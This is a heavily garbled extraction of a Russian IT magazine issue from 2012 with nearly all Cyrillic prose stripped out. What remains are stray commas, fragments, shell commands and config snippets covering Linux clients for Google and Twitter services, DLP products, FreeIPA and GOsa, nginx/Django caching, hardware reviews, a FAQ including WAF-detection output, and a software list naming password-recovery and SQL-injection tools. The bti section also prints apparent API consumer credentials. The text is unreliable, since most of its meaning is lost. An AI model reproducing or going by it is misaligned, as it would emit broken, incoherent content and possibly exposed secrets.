UNIXOID
(zobnin@gmail.com)
LINUX
, ,
. Gmail,
YouTube, GDocs -,
. -,
?
,
? , -,
Google Chrome OS? , , ,
Plan9,
?
, ,
, ,
.
.
Linux (Ubuntu One),
YouTube
(Totem, ,
),
- ( KDE
Google Gadgets)
-.
,
Linux-.
,
110
-
-. Twitter, ,
,
,
, , .
.
,
. ?
Twitter-.
-
Linux
. Twitter-
Gwibber, , ,
Identi.ca, StatusNet, Facebook, Flickr, Digg,
FriendFeed Qaiku. ,
, , Gnome.
Tyrs Twitter-
03 /158/ 2012
, ,
Pino Hotot.
,
. TweetDeck
Twitter-,
.
Adobe AIR,
. IM-
Pidgin Twitter-
( pidgin-twitter).
, :
.
.
Twitter- ncurses.
Linux- Greg Kroah-Hartman.
bti , , :
$ echo "My current uptime is 'uptime'" | bti
,
,
OAuth-, . (twitter.com/
apps/new) Consumer Key
Consumer Secret bti:
$ vi ~/.bti
# Consumer key
consumer_key=cZy8DdioswAfu3LJYg6E2w
# Consumer secret
consumer_secret=fnIGGU0T12mMWKjmThUdSeKN
32NLWfmnwapwubVQ
bti. ,
PIN.
bti,
access_token_key access_token_
secret, . bti ,
.
YouTube
03 /158/ 2012
Google-
, ,
. Gnome
Totem. KDE4
minitube,
,
-. KDE,
. youtube-viewer,
MPlayer.
youtube-viewer,
,
.
.
( '-t'),
('-a'), - ('-p')
('-M'). '-2', '-3', '-4', '-7', '-1' (240p, 360p,
480p, 720p 1080p ).
'-sub=ru' MPlayer
.
(50 20),
'-m'. youtube-viewer
YouTube.
, MPlayer
.
HD-,
flash-
, MPlayer -
.
,
( , , ). youtube-viewer
videotop, ncurses- vi-
.
:
.
( -
- , ),
. ,
Gmail, CheckGmail Gmail Notifier.
.
Gmail. KDE4
kdeplasma-gmailnotifier. ,
, ( ,
),
, KDE
.
.
sup,
Mutt.
translator, //
, cliweather,
.
, ,
notify-send:
$ notify-send \
'cliweather -'
cron (, ,
).
-
GOOGLE DOCS
FS UBUNTU
$ sudo add-apt-repository ppa:doctormo/ppa
$ sudo apt-get update
$ sudo apt-get install google-docs-fs
111
UNIXOID
GDataCopier, Google Docs.
: gls
, gcp , gmkdir
grm gmv
.
. ,
:
$ gls username@gmail.com:/docs/
PDF :
$ gcp -f pdf \
username@gmail.com:/docs//* /tmp/
3. :
$ google contacts add \
' ,zobnin@gmail.com'
4. Google Docs
( ,
EDITOR):
$ google docs edit --title \
" "
5. Picasa ( ):
$ google picasa create --title \
" " ~/photos/*.jpg
:
6. YouTube:
$ gmkdir \
username@gmail.com:/doc/_
, GoogleCL,
, Blogger,
, (Gmail), Google Docs,
Picasa YouTube ( ).
,
.
1.
Blogger:
$ google blogger post --blog 'Linuxoid' \
--title ' GoogleCL!' --tags 'linux, \
cli' ' GoogleCL, \
bla-bla, bla'
2. :
Google- (
Gmail) ,
GoogleCL .
.
,
-
. - -
( ,
-)?
Desktop web
application,
Youtube-viewer YouTube
112
-
, .
- Mozilla
Prism (prism.mozillalabs.com), -
,
.
,
,
,
.
( ,
web- ),
.
, Google Chrome
- . -,
, ( /
), !
,
/. ,
,
, Chrome Web Store (
):
$ chromium --app=http://gmail.com
.
-
Firefox. : favicon ,
.
- ,
. ,
,
,
- ,
,
.
,
surf.
surf WebKit,
. , HTML-,
03 /158/ 2012
.
:
$ surf http://gmail.com
Gmail .
,
.
,
wmctrl:
#!/bin/sh
surf http://gmail.com
wmctrl -r surf -e '0,50,50,400,300'
Gmail surf,
400 x 300
, 50
.
.
-
, -
,
GOOGLE AUTH
Google
,
(),
Google,
.
https://www.google.com/settings,
,
.
03 /158/ 2012
(,
YouTube),
(, )
-.
FUSE: YoutubeFS,
GDataFS, GmailFS, Google Docs FS (
goofs, Java). flickrfs,
flickr.com MetaWeblogFS.
.
,
. , YoutubeFS (code.google.
com/p/youtubefs/) YouTube. ,
. :
# vi /etc/gmailfs/gmailfs.conf
[account]
username = usernamegmail.com
password =
[filesystem]
fsname = linux_fs_4
[logs]
level = INFO
logfile = ~/gmailfs.log
:
$ ./gmailfs.py -o allow_root none \
///
$ ./youtubefs.py username@gmail.com \
///
$ gmount /// \
username@gmail.com
- ,
.
. GDataFS (gdatafs.sourceforge.
net),
. :
,
docs.google.com.
, ,
. gumount:
$ gdatafs /// \
username@gmail.com
GmailFS (sr71.net/
projects/gmailfs/) Gmail. IMAP,
( POP/IMAP
IMAP).
/etc/gmailfs/gmailfs.conf
:
$ gumount ///
-
.
.
. -
.
, ,
, . z
113
SYN/ACK
SYN/ACK
grinder (grinder@synack.ru)
00000000\r_NET (0000nline.ru)
. , ,
, .
DLP-,
. ,
, ,
, .
114
0114
INFO
DLP
,
DLP
.
WWW
Ubuntu
MyDLP downloads.medratech.
com/ubuntu.
2012
03
01 /158/
/156/ 2012
Drupal
DLP?
,
. , -
() ,
,
.
. ,
, , ,
. .
,
IM VoIP, ,
, . .
,
.
( , ),
DLP (Data Leak Prevention). - : ILDP
(Information Leak Detection & Prevention), IPC (Information Protection
and Control), ILP (Information Leak Prevention) . ,
-, , .
, , DLP,
, -
DLP. , ,
, ,
.
,
DLP-. :
(SMTP, POP3, IMAP);
IM/VoIP- P2P-;
- ( , , ), HTTP, HTTPS FTP;
(SMB Printing, NCP Printing, LPD, . .);
(USB, CD/DVD, , Bluetooth,
. .), .
(, -, )
( , -
/158/ 2012
2012
03
01 /156/
DLP
. .). , ,
,
.
, DLP-
. , DLP,
. - ,
DLP ( ,
) , , .
, .
DeviceLock DLP
115
0115
SYN/ACK
SYN/ACK
00000000\r_NET (0000nline.ru)
WEBSENSE DSS
.
400 (
), . PreciseID, : , ,
. .
Websense Deep Content Control
ThreatSeeker ( -
).
: (SMTP), MS Exchange, HTTP/HTTPS, FTP,
IM/MSN. ICAP , .
Websense
(SPAN).
Websense DSS .
,
( ,
), , .
.
- ,
. Websense
,
.
( ) Websense (,
FALCONGAZE SECURETOWER
: falcongaze.ru.
: .
: Windows 2003/2008 (x86/x64).
: Windows XP/Vista/7/2003/2008 (x86/x64).
: .
, OOO .
, , ( , ,
. .).
,
(HTTP/S, FTP/S, POP3/S, SMTP/S, IMAP, OSCAR, , MSN, XMPP).
MS Exchange 2007/2010,
. Skype, SecureTower
, , SMS.
OPENDLP
OpenDLP (code.google.com/p/
opendlp)
,
Windows.
.
Netbios/SMB.
,
Windows
( SMB), *nix- (SSH) (MS
SQL MySQL).
-,
,
116
0116
SSL ( libcurl).
,
.
Perl-
,
, SSN,
,
(Google Docs, Gmail).
.
( ,
)
(
).
,
,
,
,
.
.
0.1
2010-, 0.4.3.
Perl,
Apache
Linux,
MySQL. .
2012
03
01 /158/
/156/ 2012
Drupal
Websense DSS
DLP (
).
: IP , MAC-, ,
, . . MS Word/Excel, PDF
.
, , .
SecureTower ,
, .
, SecureTower,
, ,
, IP-
, . .
,
( Active Directory).
, SecureTower ,
DLP, . ,
,
. ,
. ,
,
, .
SecureTower :
c
( );
,
, ( );
c , , , , .
MS SQL Server,
Oracle, SQLite PostgreSQL. ,
, . -
/158/ 2012
2012
03
01 /156/
, ,
Falcongaze SecureTower
Admin Console Falcongaze SecureTower
Client.
, (
, ), , .
SYN/ACK
SYN/ACK
MyDLP
00000000\r_NET (0000nline.ru)
Falcongaze SecureTower
- (Squid) -,
Postfix, MS Exchange, Zimbra;
ACL IP- .
, MyDLP , ( ).
, MyDLP, :
MyDLP Network ,
TCP- MyDLP.
Erlang Python,
, .
MyDLP Endpoint ,
( 32/64- WinXP-Se7en), : ,
, , . .
MyDLP Security Monitor , ,
.
MyDLP Web UI Network
Endpoint, Web UI, . PHP
Adobe Flex, MySQL.
. Easy, Simple, Open
MyDLP. ,
.
,
. ISO- (
Ubuntu), VMware Ubuntu 10.04 LTS (downloads.
medratech.com/ubuntu).
Enterprise-, , , ,
.
, DLP , ,
. ,
,
, .
,
,
. z
2012
03
01 /158/
/156/ 2012
SYN/ACK
grinder (grinder@synack.ru)
WARNING
FreeIPA
2.1.3
CSRF (CVE2011-3636).
2.1.4.
INFO
FreeIPA
oVirt
,
KVM.
,
.
WWW
389
Directory Server
directory.fedoraproject.org.
GOsa
oss.gonicus.de/labs/
gosa.
Red Hat
IPA redhat.com/
promo/ipa.
FreeIPA freeipa.org.
Mandriva
Directory Server
mds.mandriva.org.
120
,
.
,
.
,
LDAP
Active Directory.
389-ds
389DS
setup-dsadmin.pl.
systemconfig-autentification,
Fedora,
,
FreeIPA.
03 /158/ 2012
GOsa *nix
389DS.
-
, .
read-only ,
Read Only Domain Controller Active Directory Win2k8.
RHEL/Fedora ( CentOS).
, Linux (Debian, Ubuntu, Gentoo),
Solaris, HP/UX 11. Windows,
Irix, AIX OSF/1.
.
389DS GNU GPL, (MPL/
LGPL/GPL/X). , 389DS
FreeIPA
.
.
FUSIONDIRECTORY
GOsa
,
Gonicus GmbH, ,
,
.
FusionDirectory (fusiondirectory.org).
03 /158/ 2012
,
,
.
2011- FusionDirectory 1.0.2, ,
, -
GOsa
. , ,
, ,
GOsa,
FusionDirectory
.
(Debian, CentOS 5/RHEL 5, Fedora
14/15, openSUSE 11.3/11.4, SLES 11), , ,
,
.
.
Apache2
Lighttpd,
nginx,
.
121
SYN/ACK
FreeIPA
FREEIPA
: freeipa.org.
: GNU GPL.
: Fedora/CentOS, Linux, AIX, HPUX, Solaris, openSUSE.
FreeIPA (Free Identity, Policy and Audit) Linux- ,
122
, FreeIPA, : , . ,
, FreeIPA (,
-, Java).
, (LDB XML),
. SSSD (System Security
Services Daemon).
Red Hat/Fedora , : AIX,
HP-UX, Solaris, openSUSE. ,
Ubuntu/Debian (launchpad.net/freeipa)
Red Hat.
(certmonger)
, .
DNS- BIND
( LDAP BIND
03 /158/ 2012
Fedora
FreeIPA
GOSA2
: oss.gonicus.de/labs/gosa.
: GNU GPL.
: Debian/Ubuntu, RedHat/CentOS/Fedora,
openSUSE/SLES, *nix.
GOsa2,
,
-. *nix Samba, , , , ,
: DHCP, DNS, HTTP, SMTP
. . Gonicus GmbH,
GOsa .
( =
), .
30 , , Squid, DansGuardin,
Postfix, Courier-IMAP, Maildrop, GNARWL, Cyrus-SASL, OpenSSL,
ISC DHCP, WebDAV, PureFTPd, PPTP, Kerberos, Asterisk, Nagios,
OPSI, Netatalk, FAI, rsyslog, :
SOGo, OpenGroupware, Kolab, Scalix.
, .
,
.
( )
.
ACL , , (/) .
: , , , ,
. .
GOsa . ,
, gettext .
Linux. Debian,
. Red Hat/CentOS/Fedora
openSUSE/SLES, , ,
, . -, Apache2
nginx. ,
.
03 /158/ 2012
, GOsa2.
,
Linux,
.
. z
123
SYN/ACK
SYN/ACK
(execbit.ru)
NGINX DJANGO
-
, nginx, memcached, eaccelerator, hiphop .
, PHP.
Django?
124
03 /158/ 2012
Django memcached .
:
CACHE_BACKEND = memcached://172.19.26.240:11211;172.19.26.242:11212;
172.19.26.244:11213/
Django
, , -
Django. Django? , ,
. Django
Python, .
-- (MVC) , , ,
Django-
. 90% , , ,
(,
-
). SQL,
Python,
.
, ,
. - , ,
-. ,
, nginx,
.
-
nginx - (
).
, nginx
Django. ,
WSGI, Python,
. ,
mod_wsgi nginx,
uWSGI (projects.unbit.it/
uwsgi),
(
: nichol.as/benchmark-of-python-web-servers).
. ,
memcached.
, .
,
HTML-
,
.
, ,
,
. . ,
- .
, ,
. , :
03 /158/ 2012
MySQL , , PostgreSQL.
Django, uWSGI python-memcached Python.
$ sudo easy_install django uwsgi python-memcached
djohnny-cache,
:
$ sudo easy_install djohnny-cache
NGINX
nginx. . nginx:
$ sudo mv /etc/nginx/{nginx.conf,nginx.conf.old}
:
# vi /etc/nginx/nginx.conf
#
#
worker_processes 4;
#
worker_priority -5;
# gettimeofday(),
#
timer_resolution 100ms;
error_log /var/log/nginx/error.log;
pid
/var/run/nginx.pid;
events {
# ,
#
worker_connections 1024;
# FreeBSD
# use kqueue;
}
http {
DJANGO
PYTHON,
125
SYN/ACK
SYN/ACK
Django
#
include
/etc/nginx/mime.types;
access_log
/var/log/nginx/access.log;
# sendfile()
sendfile
on;
tcp_nopush
off;
# keepalive- 65
keepalive_timeout 65;
# GZIP-
gzip on;
gzip_min_length 1100;
gzip_buffers 64 8k;
gzip_comp_level 3;
gzip_http_version 1.1;
gzip_proxied any;
gzip_types text/plain application/xml
application/x-javascript text/css;
# (
# Debian
include /etc/nginx/sites-enabled/*;
}
:
, ,
memcached .
nginx
.
use kqueue nginx FreeBSD
kqueue epoll.
sendfile() .
, ,
. ,
126
-
ab Apache:
$ ab -kc 500 -n 10000 http://10.1.1.1/
httperf:
$ httperf --hog --server=10.1.1.1 \
--wsess=2000,10,2 --rate 300 --timeout 5
03 /158/ 2012
#
access_log /var/log/nginx/blog-access.log;
error_log /var/log/nginx/blog-error.log;
# , Django
location ^~ /media/ {
root /usr/local/lib/python2.6/dist-packages/
django/contrib/admin;
}
#
location ~* ^.+\.(jpg|jpeg|gif|png|ico|css|zip|tgz|gz
|rar|bz2||pdf|ppt|txt|tar||bmp|js|mov) {
root /var/www/host.com
}
# WSGI-
location / {
uwsgi_pass 127.0.0.1:8012;
include uwsgi_params;
}
}
:
/var/www/host.com uWSGI- 127.0.0.1:8012. Django uWSGI.
DJANGO UWSGI
Django uWSGI
. ,
.
DJANGO 1.3
Django 1.3 --
:
# memcached ( )
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.memcached.
MemcachedCache',
'LOCATION': [
'172.19.26.240:11211',
'172.19.26.242:11211',
]
}
}
#
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.db.
DatabaseCache',
'LOCATION': '_',
}
}
1. Django-:
# cd /var/www
# django-admin.py startproject mysite
import django.core.handlers.wsgi
application = django.core.handlers.wsgi.WSGIHandler()
2. :
3. uWSGI- ( -p
):
django.xml
<uwsgi>
<socket>127.0.0.1:8012</socket>
<pythonpath>/var/www/mysite/</pythonpath>
<module>django_wsgi</module>
</uwsgi>
# uwsgi -p 4 -s 127.0.0.1:8012
uWSGI , - /etc/rc.local:
django_wsgi.py
import os
os.environ['DJANGO_SETTINGS_MODULE'] = 'settings'
# vi /etc/rc.local
cd /var/www/mysite
uwsgi -p 4 -s 127.0.0.1:8012
--
per-site
caching
per-page
caching
Page-fragment
caching
Python-object
caching
Upstreams caching
(cachings at browswrs
ISP, proxy)
,
Caching APls
Memcached
In-dat abase
cached
- Django
03 /158/ 2012
Filesystem
cached
Local-m emory
cached
,
. ,
, .
.
, -.
-, .
Django
. :
. :
, , .
, ,
. .
-, , .
, .
,
127
SYN/ACK
SYN/ACK
,
,
. , , ,
- , ,
memcached.
-, . , , , .
, ,
. .
. Django :
memcached , ;
, ;
;
, .
,
VPS. , ,
.
, -.
settings.py :
# memcached
CACHE_BACKEND = 'memcached://127.0.0.1:11211/'
# ( , )
CACHE_BACKEND = 'db://_'
#
CACHE_BACKEND = 'file://///'
#
CACHE_BACKEND = 'locmem:///'
# ( )
CACHE_BACKEND = 'dummy:///'
. manage.py:
# python manage.py createcachetable _
- :
timeout (
300);
max_entries (
300);
cull_frequency ,
max_entries ( 3,
).
CGI, :
CACHE_BACKEND = "locmem:///?timeout=30&max_entries=400"
-
-
128
uWSGI
, ,
, ,
. ,
, , ,
.
Django
settings.py:
#
MIDDLEWARE_CLASSES = (
#
'django.middleware.cache.CacheMiddleware',
# middleware...
'django.middleware.cache.FetchFromCacheMiddleware',
)
# " "
CACHE_MIDDLEWARE_SECONDS='300'
.
. .
.
johnny-cache,
memcached -.
. johnny-cache Django-:
INSTALLED_APPS = (
...
'johnny',
)
middleware:
MIDDLEWARE_CLASSES = (
'johnny.middleware.LocalStoreClearMiddleware',
'johnny.middleware.QueryCacheMiddleware',
...
)
03 /158/ 2012
-- memcached
(
memcached):
CACHE_BACKEND =
'johnny.backends.memcached://127.0.0.1:11211'
JOHNNY_MIDDLEWARE_KEY_PREFIX='jc_host_com'
, !
, -.
, -
,
, , , , ,
.
, .
,
. ,
:
,
Django, -,
. , , :).
Django -
cache, :
NGINX
,
nginx. proxy_
store try_files:
location / {
root /var/www/;
try_files /cache/$uri @storage;
}
location @storage {
proxy_pass http://backend;
proxy_set_header Host $host;
proxy_store on;
proxy_store_access user:rw group:rw all:r;
proxy_temp_path /var/www/cache/;
root /var/www/cache/;
}
/var/www/cache ( tmpfs,
),
( 10 ):
$ cd /var/www/cache
$ find ./ -type f -amin +10 -delete
uWSGI Django
-, . ,
load ( ):
{% load cache %}
cache :
{% block header %}
{% cache 5000 header-cache %}
{% block logo %}
{% endblock %}
{% block menu %}
{% endblock %}
{% endcache %}
{% endblock %}
. header logo
menu, cache. , logo menu
, 5000 , .
cache , .
,
-
(,
, . .), , , .
:
{% block sidebar %}
{% cache 500 sidebar-cache request.user.username %}
...
{% endcache %}
{% endblock %}
Django- , .
.
. z
cron.
03 /158/ 2012
129
FERRUM
!
USB 3.0
, . -
( ).
,
- . , ,
,
( .
). , ,
, ,
.
, , , , -.
6 .
130
.
HD Tune Pro , HDD
. ,
, .
HDD PCMark Vantage. , ,
.
, / , ,
. , -
, , , .
03 /158/ 2012
ADATA NH13
ADATA. ADATA
NH13 750 , :
500/750 .
,
, HDD,
.
, Mini
USB 3.0.
,
,
. ,
:
USB 3.0 .
ADATA NH13 ,
.
HDD ( DVD c Windows 7),
.
3000
.
SEAGATE
STAA1500100
5000
.
03 /158/ 2012
Seagate . ,
- ,
- . , GoFlex
SATA-, SATA.
- ,
, , USB , eSATA
FireWire 800. Seagate STAA1500100 USB 3.0. , ,
.
Seagate STAA1500100
.
, 1,5
. ,
.
131
FERRUM
SILICON POWER
SP750GBPHDS20S3U
Silicon Power,
. HDD .
. ,
. Mini USB 3.0 ,
, .
750 , 500
1000 . : , ,
, Silicon Power SP640GBPHDS10S3N. -
: ,
. ,
, , , ,
.
2700
.
TRANSCEND TS1TSJ25H3P
, ,
. , ,
.
Transcend ,
,
.
, .
: USB 3.0,
. -
. ,
1 , Transcend TS1TSJ25H3P. ,
(500 750 ), , , .
3600
.
:
:
:
:
:
132
ADATA NH13
750
2,5"
USB 3.0
77 16 118
165
Silicon Power
SP750GBPHDS20S3U
Seagate STAA1500100
1,5
2,5"
USB 3.0
89 120 22
280
750
2,5"
USB 3.0
80 21 142
160
03 /158/ 2012
VERBATIM 53035
- Verbatim 53035. ,
StorenGo . , , , . ,
. , Verbatim
53035 , HDD. , ,
Mini USB 3.0. ,
1 ,
.
,
Verbatim 53035
.
:
Nero, Green Button,
. ,
.
, , .
3800
.
WESTERN DIGITAL
WDBACX0010BBK
,
. My Passport
Essential SE ,
: , , . ,
, , .
: , Mini USB 3.0
. My Passport Essential SE
, 750 .
-
, ,
2,5- HDD. 1000 , . ,
. ,
. ,
.
3500
.
AWARDS
Transcend
TS1TSJ25H3P
1
2,5"
USB 3.0
81 22 131
256
03 /158/ 2012
Verbatim 53035
1
2,5"
USB 3.0
82 20 127
185
Western
Digital WDBACX0010BBK
1
2,5"
USB 3.0
83 18 110
200
, ,
.
, ,
, . ,
, , Verbatim 53035. ,
, Silicon Power SP750GBPHDS20S3U. z
133
FERRUM
PCMARK VANTAGE,
Seagate STAA1500100
Silicon Power
SP750GBPHDS20S3U
Seagate STAA1500100
Silicon Power
SP750GBPHDS20S3U
Transcend TS1TSJ25H3P
Transcend TS1TSJ25H3P
Verbatim 53035
Verbatim 53035
Western Digital
WDBACX0010BBK
Western Digital
WDBACX0010BBK
0
0 10 15 20 25 30 35 40 45
PCMark Vantage
, , ,
PCMARK VANTAGE, /
Seagate STAA1500100
Seagate STAA1500100
Silicon Power
SP750GBPHDS20S3U
Silicon Power
SP750GBPHDS20S3U
Transcend TS1TSJ25H3P
Transcend TS1TSJ25H3P
Verbatim 53035
Verbatim 53035
Western Digital
WDBACX0010BBK
Western Digital
WDBACX0010BBK
Windows Defender
Gaming
Improting Pictures to Windows photo Gallery
Windows Vista startup
Video editing using Windows Movie Market
Windows Media Center
Adding music to Windows Media Player
Application loading
0 10 20 30 40 50 60 70 80
- ,
.
20
40
60
80
100
120
140
: ,
134
03 /158/ 2012
FERRUM
:
: RMS 25 + 25
(THD + N = 10 %)
-: > 85
: < 0,05 %
: 20 ~ 20
: 700 100
: , , FM,
: 5,75 (148 ),
, 6 ,
: 1 (25 ),
, , 6
: : 318 191 x 284 ;
: 318 186 271
: RCA- (RCA-RCA RCA
AUX), FM-, SD-, USB-
: 11
4800
.
EDIFIER R2500
2.0
Edifier, 2.0
R2500 ( Studio 5)
, . , , ,
. , , ?
, Edifier R2500
. - , .
Edifier R2500 MDF
.
.
,
5,75- -
- .
. Edifier R2500
,
.
.
136
.
Edifier R2500 .
( , , FM-),
USB- SD-. Edifier
R2500 MP3 WMA.
. .
.
RCA- (RCA-RCA RCA AUX),
FM-. Edifier
R2500 .
50 , -
5,75- -.
6 .
, , .
, Edifier R2500
.
! ,
. . .
, Edifier R2500
.
, ,
.
. , ,
2.1 5.1. ,
.
, Edifier R2500, ! z
03 /158/ 2012
12 2200 .
6 1260 .
,
!
.
: 210
x 09 (152) 2011
LULZSEC
09 (152) 2011
082
1. , , shop.glc.ru.
2. .
3.
:
e-mail: subscribe@glc.ru;
: (495) 545-09-06;
: 115280, ,
. , 19, ,
5 ., 21,
, .
500 .
WINDOWS 7
PHPMYADMIN
064
ANDROID 070
152
,
JAVASCRIPT 050
:
, ,
FOX NEWS
+ + 2 DVD:
162
( 35% , )
!
,
.
12 3890 (24 )
6 2205 (12 )
.
,
FERRUM
WEXLER.BOOK
T7055
, ,
, ,
.
,
, - .
WEXLER.BOOK T7055 , .
: ,
,
WEXLER.BOOK T7055 ,
-. !
, ,
,
,
. , , ,
, , WEXLER.BOOK T7055.
: !
, ,
, ,
,
,
. ,
.
,
.
TFT-
.
WEXLER.BOOK T7055 G-,
138
:
: , , 7, LED
: 8
: microSD, 32
: ANSI, Unicode, TXT, PDF,
HTML, PDB, EPUB, FB2, DJVU, DOC
: MP3, WMA, FLAC, AAC, WAV,
OGG
: JPG, BMP, GIF
: WMV, RM, AVI, RMVB, 3GP, FLV,
MP4, DAT, VOB, MPG, MPEG, MKV, MOV
: FM-
: 190 x 125 x 11,5
: 315
+
+
3500
.
,
.
,
microSD 32 .
, , ,
,
. FM-
.
, WEXLER.
BOOK T7055 .
.
.
.
,
.
microSD
. , WEXLER.
BOOK T7055 . , ,
FM-. z
02 /157/ 2012
>> coding
!
shop.glc.ru
40%
8-800-200-3-999
+7 (495) 663-82-77 ()
6 1110 .
13 1999 .
6 1110 .
13 1999 .
6 564 .
13 1105 .
6 1110 .
13 1999 .
6 810 .
13 1499 .
6 1110 .
13 1999 .
6 630 .
13 1140 .
6 895 .
13 1699 .
6 1194 .
13 2149 .
6 894 .
13 1699 .
6 775 .
13 1399 .
6 950 .
13 1699 .
6 810 .
13 1499 .
AUDI A7
"./#.1
350.589
;8IEB?8G
4@4EB
.EEDFOR3PEED4HE2UN
.E
4OYOTA#AMRY
6 690 .
13 1249 .
(twtitter.com/stepah)
FAQ United
FAQ@REAL.XAKEP.RU
DROPBOX.COM.
,
?
!
4,5
- . Dropbox.com
. ,
,
.
, 500
Dropbox 500
.
Dropbox,
(bit.ly/AEhbvD). , AutoPlay (,
, )
Dropbox. Windows 7
Control Panel Hardware and Sound
Autoplay, XP
.
,
Q WAF
( -)?
! WAF
, .
,
, ,
WAF. , impervadetect (code.google.com/p/imperva-detect)
Imperva WAF:
# ./imperva-detect.sh https://www.
example.com
Testing [https://www.example.com] for
presence of application firewall --Test 0 - Good User Agent...
/ application firewall possibly present
Test 1 - Web Leech User Agent...
/ application firewall possibly present
Test 2 - E-mail Collector Robot User
/ application firewall possibly present
Test 3 - BlueCoat Proxy Manipulation
/ application firewall possibly present
Test 4 - Web Worm Blocking...
/ application firewall not detected
Test 5 - XSS Blocking...
/ application firewall possibly present
--- Tests Finished on [https://www.
example.com]
4 out of 5 tests indicate Imperva
application firewall present ---
WAFW00F
(code.google.com/p/waffit),
WAF.
, SVN.
,
,
MAC-?
! MAC-
Google
Location Services (samy.pl/mapxss) Skyhook
(www.skyhookwireless.com). ,
. ,
MAC-,
,
. ,
,
Google
,
Wi-Fi.
- 15
-
.
HTML5.
. ,
UI-.
140
Twitter
UI Bootstrap (twitter.github.
com/bootstrap). ( )
( IE7).
.
, , .
Bootstrap
,
. Bootstrap ,
940-.
03 /158/ 2012
FAQ UNITED
? ,
?
.
Binwalk (code.google.
com/p/binwalk).
,
.
, , firmware,
Linux, , . .
-.
- .
.
,
. ?
MYSQL?
Comet.
, Comet
,
( )
.
- : Comet
-
(bit.ly/yZ7OtH). Comet-, -
,
show processlist.
processlist
information_schema,
SQL-:
Dklab_Realplexor (dklab.ru/lib/
dklab_realplexor) Socket.IO (socket.
io). Dklab_Realplexor
,
(
PHP Python), Socket.
IO LEGO
mindshtorms
API
.
Comet-
push-,
-
, .
: Pusher (pusher.Comet), Pubnub
(www.pubnub.com), Partcl (code.google.
com/p/partcl), BeaconPush (beaconpush.
com), X-Stream.ly (x-stream.ly) ioBridge
(iobridge.com).
(bit.
ly/yLJcqm).
MSF?
Metasploit Framework
,
,
. ,
<Ctrl + C>,
. ,
MSF , ,
, ,
,
.
. ! - , !
MSF
, Twitter.
, , . ,
Bootstrap.
.
03 /158/ 2012
Pusher -,
Bootstrap ,
jQuery-. ,
, .
12
jQuery-,
, ..
BootStrap
,
, ,
, .
,
, -, . .
141
-
WINDOWS,
. -
, ,
?
,
. ,
, :
.
Windows Event Viewer Plus
(http://bit.ly/znh9fS) Windows 8 Log Collector
(http://bit.ly/wyDI0m).
,
.
,
.
.
-,
. -
?
,
SMS;
;
, Android API;
broadcast-;
SMS .
Windows- . ,
.
.
?
USB-,
.
,
X Y
.
Arduino.
webaff (bit.ly/zNDkpD).
, ,
-,
, -,
.
Knas Restarter (www.
knas.se). , , , Knas
Restarter ,
.
.
,
,
.
?
.
,
,
,
. ,
?
Android! DroidBox
(code.google.com/p/droidbox),
.
:
;
/ ;
;
, DexClassLoader;
Evalaze (www.
evalaze.de). ?
.
.
, ,
!
.
-
,
GOOGLE DOCS,
?
Joukuu
(www.joukuu.com). Joukuu
(
Dropbox, Google Docs Box.net),
- ,
. ,
Google Docs Microsoft Office
,
Google. z
Windows-
142
03 /158/ 2012
>Net
Alpine 2.0
AthTek NetWalk Home Edition
Bluetooth Stack Switcher 1.1
DreamMail 4.6.9.0
eToolz 3.4.8
FTP Scheduler
MetroTwit
NeoDownloader 2.9
RaidCall 6.0.8
RealVNC 4.1
>Multimedia
Caesium 1.4.1
Color Desker
Free Audio Editor 2011
Free Video Dub 2.0.3
ImageGlass 1.4
IOGraph 0.9
Joukuu 1.1.5
KooBits 4.0
Little Piano 1.0.1
Motion Man
MuseScore 1.1
MusicBee 1.3.4334
Scan Tailor 0.9.11
Stealth Player 1.0
view3dscene 3.11.0
Windows 7 Logon Screen
Tweaker 1.5
>Misc
Apple Wireless Keyboard
Autosensitivity 1.4
BabyPDF 1.0
Ditto 3.18.24
Duplicate Commander 2.2
ISO Workshop 2.1
Lion UX Pack 1.0
MadAppLauncher 1.1
NexusFile 5.3.1
Pokki
Process Blocker 0.7 beta
RED 2.2
TaggedFrog 1.1
UndoClose 1.1
Volume Concierge
>>WINDOWS
>Development
ASMTool 1.3.1BETA
BinVis
Box2DFlash 2.1a
FlashDevelop 4.0.1
Geany 0.21
haXe 2.08
LINQPad 4.31
MongoDB 2.0.2
PluThon 2.0.0
ReSharper 6.1
Selenium IDE 1.6.0
SQLite 3.7.10
Unique 0.25
Visual Paradigm for UML 8.3
Community Edition
WebStorm 3.0.1
Zend Studio 9
>>UNIX
>Desktop
Asunder 2.1
Cinnamon 1.1.3
Clementine 1.0.0
Converseen 0.4.8
Echinus 0.4.9
Eina 0.14.0
Hugin 2011.4.0
>System
Auslogics Disk Defrag 3.3.0.2
DataGrab 1.2.3
Defraggler 2.09.391
DFIncBackup 2.98
Evalaze 1.1
History Viewer 4.8
Knas Restarter 2.0
MyDefrag 4.3.1
P-Apps 1.0
Puran Defrag 7.3
Speed Up Shutdown
UltraDefrag 5.0.2
USB Image Tool 1.58
Windows 8 Log Collector 1.0.0.6
>Security
Anti-Reversing Framework v1.1
BSQL Hacker 0.9.0.9
Chrome Password Decryptor 3.5
CodeReload
DAVTest 1.0
DbgCb
Deblaze 0.3
DroidBox
ExploitMyUnion 2.1
Fiddler 2.3.8.5
FindBugs 2.0.0
FiveBelow
grinder
Hexjector 1.0.7.4
HstEx 3.7
JavaSnoop 1.1
loadbalancer-finder 0.5.1
loadbalancer-finder v0.5.1
Mandiant Redline 1.0.3
RainbowCrack 1.5
Redline 1.0.3
RIPS 0.51
Scrapy 0.14
Scylla Imports Reconstruction
0.5a
Sessionthief
Sikuli-X 1.0rc3
SnD Reverser Tool 1.4
sslyze 0.3
VERA 0.3
WinTaylor 2.5.1
SecurityKiss 0.2.2
Seesmic 0.8.1
ST Proxy Switcher
streamWriter 3.6
TunnelBear
TweetDeck
WeFi 4.0.1.0
>Security
binwalk v0.4.1
BoNeSi 0.2.0
crackerpassword 1.2.1
DroidBox
FindBugs 2.0.0
Fwknop Port Knocking Utility
2.0rc5
grinder
ipt_pkd 1.10
LFI Fuzzploit Tool
loadbalancer-finder v0.5.1
NETZOB 0.3.1
>Net
Blogilo 1.0
EiskaltDC++ 2.2.5
Firefox 9.0.1
FreeRDP 1.0.0
LAN Messenger 1.2.16
LeechCraf 0.4.95-578
Masqmail 0.3.4
NTM 1.3.1
ownCloud 2.0.1
PirateWall 0.2.1
pyLoad 0.4.9
QupZilla 1.1.0
RSSOwl 2.1.2
SquidAnalyzer 4.2
Super Flexible File Synchronizer
5.61
Tixati 1.82
Window Switch 0.12.9
ZMail 0.7
>Devel
ART 0.9.01
